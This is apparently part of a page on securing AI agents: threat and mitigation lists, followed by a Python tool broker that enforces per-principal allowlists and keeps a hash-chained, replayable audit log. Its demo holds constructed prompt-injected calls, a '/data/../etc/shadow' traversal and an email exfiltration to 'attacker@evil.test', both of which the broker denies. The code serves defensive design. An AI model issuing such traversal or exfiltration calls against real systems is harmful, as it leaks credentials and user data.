- Malicious users
- Compromised AI models
- Rogue tools or plugins
- Insider threats
- Model inference interfaces
- Tool execution runtime
- Memory storage backends
- Configuration and policy injection
- Prompt injection
- Data exfiltration
- Privilege escalation
- Model poisoning
- Unauthorized tool execution
- Strict sandboxing
- Least-privilege access
- Deterministic execution modes
- Audit logging and replay
- Policy enforcement at kernel level
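The mitigations listed above (least-privilege access, sandboxing of tool execution, deterministic execution, audit logging with replay, and policy enforcement outside the model's reach) are combined in the following added example. It is not code from the original page or from any project the page describes. It models a tool-execution broker that sits between an agent and its tools: every call is checked against a per-principal allowlist with argument constraints, executed against a constructed in-memory environment, and recorded in a hash-chained audit log that can later be replayed. The principals (`report-summarizer`, `notifier`), tool names, policy rules, fake filesystem contents and the injected tool calls are all constructed for illustration.

```python
import hashlib
import json
import posixpath
from typing import Any, Callable

# Constructed in-memory "filesystem"; stands in for the sandboxed tool runtime.
FAKE_FS = {
    "/data/report.txt": "Q3 revenue: 12.4M",
    "/etc/shadow": "root:$6$constructed-secret",
}

def read_file(path: str) -> str:
    return FAKE_FS[path]

def send_email(to: str, body: str) -> str:
    return f"queued mail to {to} ({len(body)} bytes)"

# Hypothetical tool registry exposed to the agent.
TOOLS: dict[str, Callable[..., Any]] = {"read_file": read_file, "send_email": send_email}

# Hypothetical least-privilege policy: each principal gets only the tools it needs,
# with argument constraints. Anything not listed is denied by default.
POLICY: dict[str, dict[str, dict[str, str]]] = {
    "report-summarizer": {"read_file": {"path_prefix": "/data/"}},
    "notifier": {"send_email": {"to_domain": "@example.com"}},
}

class PolicyViolation(Exception):
    pass

def check_policy(principal: str, tool: str, args: dict[str, Any]) -> None:
    """Enforced by the broker, not the model: a prompt cannot talk its way past this."""
    rules = POLICY.get(principal, {}).get(tool)
    if rules is None:
        raise PolicyViolation(f"{principal} is not allowed to call {tool}")
    if "path_prefix" in rules:
        # Normalize before the prefix test: "/data/../etc/shadow" must not pass.
        path = posixpath.normpath(args.get("path", ""))
        if not path.startswith(rules["path_prefix"]):
            raise PolicyViolation(f"{tool}: path {path!r} outside {rules['path_prefix']!r}")
    if "to_domain" in rules and not args.get("to", "").endswith(rules["to_domain"]):
        raise PolicyViolation(f"{tool}: recipient {args.get('to')!r} not in {rules['to_domain']!r}")

def _digest(obj: Any) -> str:
    # Canonical JSON so the same record always hashes the same way.
    return hashlib.sha256(json.dumps(obj, sort_keys=True, separators=(",", ":")).encode()).hexdigest()

class ToolBroker:
    """Single choke point for tool calls: policy check, execution, hash-chained audit record."""

    def __init__(self) -> None:
        self.log: list[dict[str, Any]] = []

    def call(self, principal: str, tool: str, args: dict[str, Any]) -> Any:
        record: dict[str, Any] = {
            "seq": len(self.log),
            "principal": principal,
            "tool": tool,
            "args": args,
            "prev_hash": self.log[-1]["hash"] if self.log else "0" * 64,
        }
        try:
            check_policy(principal, tool, args)
            result: Any = TOOLS[tool](**args)
            record["decision"] = "allow"
            record["result_hash"] = _digest(result)  # result itself may be sensitive; log only its hash
        except PolicyViolation as exc:
            record["decision"] = "deny"  # denials are logged too: they are the injection attempts
            record["reason"] = str(exc)
            result = exc
        record["hash"] = _digest(record)
        self.log.append(record)
        if isinstance(result, PolicyViolation):
            raise result
        return result

def verify_chain(log: list[dict[str, Any]]) -> bool:
    """Detect edited or dropped records: each hash covers the record and the previous hash."""
    prev = "0" * 64
    for rec in log:
        body = {k: v for k, v in rec.items() if k != "hash"}
        if rec["prev_hash"] != prev or _digest(body) != rec["hash"]:
            return False
        prev = rec["hash"]
    return True

def replay(log: list[dict[str, Any]]) -> bool:
    """Deterministic execution lets an auditor re-run every allowed call and compare result hashes."""
    if not verify_chain(log):
        return False
    return all(
        _digest(TOOLS[rec["tool"]](**rec["args"])) == rec["result_hash"]
        for rec in log if rec["decision"] == "allow"
    )

def demo() -> tuple[dict[str, str], list[dict[str, Any]]]:
    broker = ToolBroker()
    outcomes: dict[str, str] = {}
    # Legitimate call inside the principal's allowed prefix.
    outcomes["read_ok"] = broker.call("report-summarizer", "read_file", {"path": "/data/report.txt"})
    # Constructed prompt-injected calls: traversal out of the prefix, then exfiltration
    # through a tool this principal was never granted.
    for name, tool, args in [
        ("traversal", "read_file", {"path": "/data/../etc/shadow"}),
        ("exfil", "send_email", {"to": "attacker@evil.test", "body": outcomes["read_ok"]}),
    ]:
        try:
            broker.call("report-summarizer", tool, args)
            outcomes[name] = "allowed"
        except PolicyViolation as exc:
            outcomes[name] = f"denied: {exc}"
    outcomes["replay"] = "ok" if replay(broker.log) else "MISMATCH"
    return outcomes, broker.log

if __name__ == "__main__":
    print(json.dumps(demo()[0], indent=2))
```

Two design choices matter here. The policy is evaluated in the broker, so a compromised model or an injected prompt can only request calls, never authorize them; and the log records denials as well as allows, since the denied calls are the evidence of an attack. Replay only works because the tools are deterministic over a fixed environment; tools that read wall-clock time or call external services would need their inputs captured in the record for the result hashes to reproduce.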